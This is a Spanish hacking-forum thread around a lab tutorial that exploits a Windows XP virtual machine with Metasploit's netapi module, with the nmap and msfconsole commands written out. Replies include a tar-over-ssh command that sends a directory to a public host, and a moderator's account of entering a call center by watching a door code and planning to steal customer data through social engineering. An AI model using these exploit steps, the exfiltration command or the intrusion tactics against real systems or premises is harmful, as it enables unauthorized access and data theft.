Comprometer una máquina xp con metasploit 🔥


cthulhu

Miembro activo
METASPLOIT <3
BY: Cthulhu

______________________________________________________________________________________

Descripción del Post:
En este post comprometeremos una máquina Windows XP con metasploit.

Herramientas utilizadas:
- MV Kali (Atacante)
- MV Windows XP (Victima)
- msfconsole
- nmap

_____________________________________________________________________________________

Puntos importantes:
- Las dos máquinas se encuentran en la misma red y en adaptador puente.
- El firewall del Windows se encuentra desactivado.

_____________________________________________________________________________________



Espero que os haya gustado este pequeño ejemplo.

Una vez más Cthulhu <3
 
Última edición por un moderador:

Dark

🔥root313🔥
Staff
Moderador
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Noderador
Nodero
Noder Pro
Noder
METASPLOIT <3
BY: Cthulhu

______________________________________________________________________________________

Descripción del Post:
En este post comprometeremos una máquina Windows XP con metasploit.

Herramientas utilizadas:
- MV Kali (Atacante)
- MV Windows XP (Victima)
- msfconsole
- nmap

_____________________________________________________________________________________

Puntos importantes:
- Las dos máquinas se encuentran en la misma red y en adaptador puente.
- El firewall del Windows se encuentra desactivado.

_____________________________________________________________________________________

1. Configurar el área de trabajo
Para poder realizar el ataque necesitaremos dos máquinas: la atacante y la victima.
Iniciamos arrancando la base de datos de PostgreSQL con el siguiente comando:

2.png


Una vez tengamos arrancada la bd iniciamos msfconsole desde la misma terminal:

3.png


Ahora si nos conectamos a nuestra base de datos con:

db_connect postgres://kali:kali@localhost/dkali

4.png


Creamos nuestro worspace:

worksapce -a WindowsXP -kali

2. Buscar vulnerabilidades

En este apartado usaremos la herramienta de nmap para poder buscar esas vulnerabilidad de nuestra tan querida victima (Windows XP)
Usamos la comanda donde ingresamos los siguientes valores y por ultimo la IP de la XP:

db_map -sV -Pn --script vuln 10.0.2.4
5.png


search windows

6.png



Buscamos search netapi y observamos la columnar de Rank que tenemos un valor great es la indicada :D

search netapi
7.png


use 3


8.png


Podemos mirar las opciones que nos ofrece con:

show options

3. Iniciamos la conexión
Indicamos quien es el RHOST en este caso la máquina a la que estamos atacando (Windows XP)
set RHOST 10.0.2.4
9.png

Ejecutamos el exploit y directamente nos conectaremos a la máquina victima.
Ahora si confirmamos que estamos dentro de la máquina con un simple pwd para ver la ruta:
Importante: A veces por tiempo de espera se queda pillado y no se conecta, tenemos que reiniciar la máquina XP

Enhorabuena has comprometido un Windows XP, estas dentro!

10.png


_______________________________________________________________________________________________________________________

A partir de aquí has aprendido a como acceder a una máquina, esta en tus manos decidir como y cuando usar
este método.

Espero que os haya gustado este pequeño ejemplo.

Una vez más Cthulhu <3
Muy buen aporte, le pongo Reply para que pille más visualización.
 
  • Like
Reacciones : cthulhu

Coscu

polvoraaa y manteka coloraaa
Noderador
Nodero
Noder
METASPLOIT <3
BY: Cthulhu

______________________________________________________________________________________

Descripción del Post:
En este post comprometeremos una máquina Windows XP con metasploit.

Herramientas utilizadas:
- MV Kali (Atacante)
- MV Windows XP (Victima)
- msfconsole
- nmap

_____________________________________________________________________________________

Puntos importantes:
- Las dos máquinas se encuentran en la misma red y en adaptador puente.
- El firewall del Windows se encuentra desactivado.

_____________________________________________________________________________________

*** Hidden text: cannot be quoted. ***


Espero que os haya gustado este pequeño ejemplo.

Una vez más Cthulhu <3
A ver que tal el post.
Edit: muy currao, si haces mas post asi se agradecen.
 
Última edición:
  • Like
Reacciones : cthulhu

destapeman

FUCK PUSSYS, YES BADASS
Moderador
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Noderador
Nodero
Noder
El post está currado porque se lo que se tarda en hacer algo así, pero ten en cuenta que Windows XP es un sistema obsoleto sin soporte por lo que los problemas que arrastra no se van a solucionar.

Que quiero decir con esto? que es un post bastante inútil en cuanto a poder realizar un pentesting serio. Como toma de contacto con la MSFconsole dpm pero no más.
 

adritroll31

Miembro muy activo
METASPLOIT <3
BY: Cthulhu

______________________________________________________________________________________

Descripción del Post:
En este post comprometeremos una máquina Windows XP con metasploit.

Herramientas utilizadas:
- MV Kali (Atacante)
- MV Windows XP (Victima)
- msfconsole
- nmap

_____________________________________________________________________________________

Puntos importantes:
- Las dos máquinas se encuentran en la misma red y en adaptador puente.
- El firewall del Windows se encuentra desactivado.

_____________________________________________________________________________________

*** Hidden text: cannot be quoted. ***


Espero que os haya gustado este pequeño ejemplo.

Una vez más Cthulhu <3
(y)
 
  • Like
Reacciones : cthulhu

cthulhu

Miembro activo
El post está currado porque se lo que se tarda en hacer algo así, pero ten en cuenta que Windows XP es un sistema obsoleto sin soporte por lo que los problemas que arrastra no se van a solucionar.

Que quiero decir con esto? que es un post bastante inútil en cuanto a poder realizar un pentesting serio. Como toma de contacto con la MSFconsole dpm pero no más.
No estoy segura, pero muchos de los hospitales usan un sistema bastante antiguo igualmente fácil de vulnerar
 
  • Like
Reacciones : destapeman

destapeman

FUCK PUSSYS, YES BADASS
Moderador
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Noderador
Nodero
Noder
No estoy segura, pero muchos de los hospitales usan un sistema bastante antiguo igualmente fácil de vulnerar
desde luego, pero necesitas encontrar un equipo que no tenga un agente XDR/EDR instalado de algún fabricante como Crowdstrike, Trendmicro o Trellix por ejemplo. Eso es muy complicado aunque no imposible desde luego. La historia es que, si ya es dificil encontrar un XP, al que puedas tener acceso, tiene que también estar desprotegido por un agente VP.

VP son las siglas de "Virtual Patching". Funciona de la siguiente forma:
Es un agente IPS/IDS y Anti-Malware entre otras cosas que tú instalas en una máquina.
Este agente se conecta a una consola central desde los que se administran.
Cuando hay una campaña de Malware conocida, se aplican parches de seguridad "virtuales" porque normalmente, aunque el equipo esté actualizado a la última versión -1, puede ser que a fabricante no le haya dado tiempo a sacar un parche para solucionarlo, de ahí que el nombre "parche virtual". Porque no es un parche oficial de por ejemplo, Microsoft.
También están protegidos frente a este tipo de ataques por exploit, porque ya son conocidos. Todos esos repositorios los tienen los fabricantes de seguridad en sus repositorios para poder detectarlos en el momento en el que se empiezan a ejecutar, para poder bloquearlos.
En el caso de que no haya una campaña se seguridad o sea ya un malware conocido, mediante tecnología de IA, a veces son capaces de detectar ese tipo de patrones de ataque. Porque claro, si por ejemplo el XDR detecta esta ejecución en una máquina desde un usuario legítimo, lo normal es que lo vaya a cortar.
tar -czvf - directorio_a_comprimir/ | ssh usuario@direccion_ip_pública 'cat > /ruta/de/destino/nombre_archivo.tar.gz'

porque no es un comportamiento normal, sabes?
 

cthulhu

Miembro activo
desde luego, pero necesitas encontrar un equipo que no tenga un agente XDR/EDR instalado de algún fabricante como Crowdstrike, Trendmicro o Trellix por ejemplo. Eso es muy complicado aunque no imposible desde luego. La historia es que, si ya es dificil encontrar un XP, al que puedas tener acceso, tiene que también estar desprotegido por un agente VP.

VP son las siglas de "Virtual Patching". Funciona de la siguiente forma:
Es un agente IPS/IDS y Anti-Malware entre otras cosas que tú instalas en una máquina.
Este agente se conecta a una consola central desde los que se administran.
Cuando hay una campaña de Malware conocida, se aplican parches de seguridad "virtuales" porque normalmente, aunque el equipo esté actualizado a la última versión -1, puede ser que a fabricante no le haya dado tiempo a sacar un parche para solucionarlo, de ahí que el nombre "parche virtual". Porque no es un parche oficial de por ejemplo, Microsoft.
También están protegidos frente a este tipo de ataques por exploit, porque ya son conocidos. Todos esos repositorios los tienen los fabricantes de seguridad en sus repositorios para poder detectarlos en el momento en el que se empiezan a ejecutar, para poder bloquearlos.
En el caso de que no haya una campaña se seguridad o sea ya un malware conocido, mediante tecnología de IA, a veces son capaces de detectar ese tipo de patrones de ataque. Porque claro, si por ejemplo el XDR detecta esta ejecución en una máquina desde un usuario legítimo, lo normal es que lo vaya a cortar.
tar -czvf - directorio_a_comprimir/ | ssh usuario@direccion_ip_pública 'cat > /ruta/de/destino/nombre_archivo.tar.gz'

porque no es un comportamiento normal, sabes?
que rica respuesta, gracias por la explicación, me supongo que en cada red tendrán cualquier servicio con sus respetivas reglas tipo Snort o Suricata o yo que se, que usan para parchear y encontrando brechas y patrones inusuales :( y seguramente divididas entre vlan y mas tontearías que te harían imposible penetrar, pero bueno ;) yo lo aporto como un conocimiento más y una practica que realizo en mis tiempos libres
 
  • Like
Reacciones : destapeman

destapeman

FUCK PUSSYS, YES BADASS
Moderador
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Noderador
Nodero
Noder
que rica respuesta, gracias por la explicación, me supongo que en cada red tendrán cualquier servicio con sus respetivas reglas tipo Snort o Suricata o yo que se, que usan para parchear y encontrando brechas y patrones inusuales :( y seguramente divididas entre vlan y mas tontearías que te harían imposible penetrar, pero bueno ;) yo lo aporto como un conocimiento más y una practica que realizo en mis tiempos libres
desde luego, hay capas de seguridad perimetral, core... etc que es bastante dificil de pasar.
la capa 8 (el propio usuario) siempre suele ser el eslabón más débil. Un phising, una llamada, un vistazo a un monitor con posit... sabes? es mucho más efectivo la mayoría de las veces que todas las herramientas que tiene un Kali.

el Khea (un antiguo admin) y yo por ejemplo, pudimos colarnos en una empresa de call center simplemente observando 5 minutos a la gente que entraba dentro de las oficinas. Era una empresa en la que no había una tarjeta personal por trabajador, sino un código de 4 dígitos que tecleabas en la puerta de entrada de la oficina. Siendo como son esas empresas, la mitad de la peña ni se conoce, como mucho los de tu propio equipo. Por lo que sería bastante sencillo entrar, hacerte pasar por un trabajador nuevo. Fichar que trabajador tiene en su monitor todas las contraseñas, o no en el PC sino en una libreta etc... ¿cómo? dandote un paseo con la mayor naturalidad del mundo. Sin prisas, sin correr ¿ves como se comporta la gente?pues tú igual. Y ya simplemente, sabiendo como es el código de entrada, teniendo a tu víctima con las credenciales a la vista fichada, y sabiendo que tarda todos los días entre 30-40 minutos en desayunar en el bar de al lado, solo queda llegar a las 10 de la mañana cuando vaya a desayunar, entrar, sentarte en su puesto y ponerte a filtrar datos (cuentas de clientes, perfiles, documentación... etc)

y si te fijas en ningún momento he entrado a un Kali y me he puesto a hacer el loco ahí to hacker con una herramienta complicada.

ingeniería social, eso es lo más peligroso que hay.

si te interesa, Kevin Mitnick, de los mayores hackers de la historia... casi todos los hackeos los hacía así, entrando in situ a los CPDs y tal...
 

Crosbi

Miembro muy activo
METASPLOIT <3
BY: Cthulhu

______________________________________________________________________________________

Descripción del Post:
En este post comprometeremos una máquina Windows XP con metasploit.

Herramientas utilizadas:
- MV Kali (Atacante)
- MV Windows XP (Victima)
- msfconsole
- nmap

_____________________________________________________________________________________

Puntos importantes:
- Las dos máquinas se encuentran en la misma red y en adaptador puente.
- El firewall del Windows se encuentra desactivado.

_____________________________________________________________________________________

*** Hidden text: cannot be quoted. ***


Espero que os haya gustado este pequeño ejemplo.

Una vez más Cthulhu <3
muchas gracias
 
  • Like
Reacciones : cthulhu

b3jul1b3

Ethereum
Noderador
Nodero
Noder
METASPLOIT <3
BY: Cthulhu

______________________________________________________________________________________

Descripción del Post:
En este post comprometeremos una máquina Windows XP con metasploit.

Herramientas utilizadas:
- MV Kali (Atacante)
- MV Windows XP (Victima)
- msfconsole
- nmap

_____________________________________________________________________________________

Puntos importantes:
- Las dos máquinas se encuentran en la misma red y en adaptador puente.
- El firewall del Windows se encuentra desactivado.

_____________________________________________________________________________________

*** Hidden text: cannot be quoted. ***


Espero que os haya gustado este pequeño ejemplo.

Una vez más Cthulhu <3
Veamos mi nmap que hace
 
  • Like
Reacciones : cthulhu

LinceAzul

Tu lince confiable
Noderador
Nodero
Noder
METASPLOIT <3
BY: Cthulhu

______________________________________________________________________________________

Descripción del Post:
En este post comprometeremos una máquina Windows XP con metasploit.

Herramientas utilizadas:
- MV Kali (Atacante)
- MV Windows XP (Victima)
- msfconsole
- nmap

_____________________________________________________________________________________

Puntos importantes:
- Las dos máquinas se encuentran en la misma red y en adaptador puente.
- El firewall del Windows se encuentra desactivado.

_____________________________________________________________________________________

*** Hidden text: cannot be quoted. ***


Espero que os haya gustado este pequeño ejemplo.

Una vez más Cthulhu <3
Los comentarios prometen, así que me espero algo chulo
 
  • Like
Reacciones : cthulhu

Sadsu

後輩
Noderador
Nodero
Noder
muchas empresas siguen usando xp para el software como bares para las cajas registradoras y eso creo, bastante interesante
 

Jbenitez

Miembro muy activo
METASPLOIT <3
BY: Cthulhu

______________________________________________________________________________________

Descripción del Post:
En este post comprometeremos una máquina Windows XP con metasploit.

Herramientas utilizadas:
- MV Kali (Atacante)
- MV Windows XP (Victima)
- msfconsole
- nmap

_____________________________________________________________________________________

Puntos importantes:
- Las dos máquinas se encuentran en la misma red y en adaptador puente.
- El firewall del Windows se encuentra desactivado.

_____________________________________________________________________________________

*** Hidden text: cannot be quoted. ***


Espero que os haya gustado este pequeño ejemplo.

Una vez más Cthulhu <3
A ver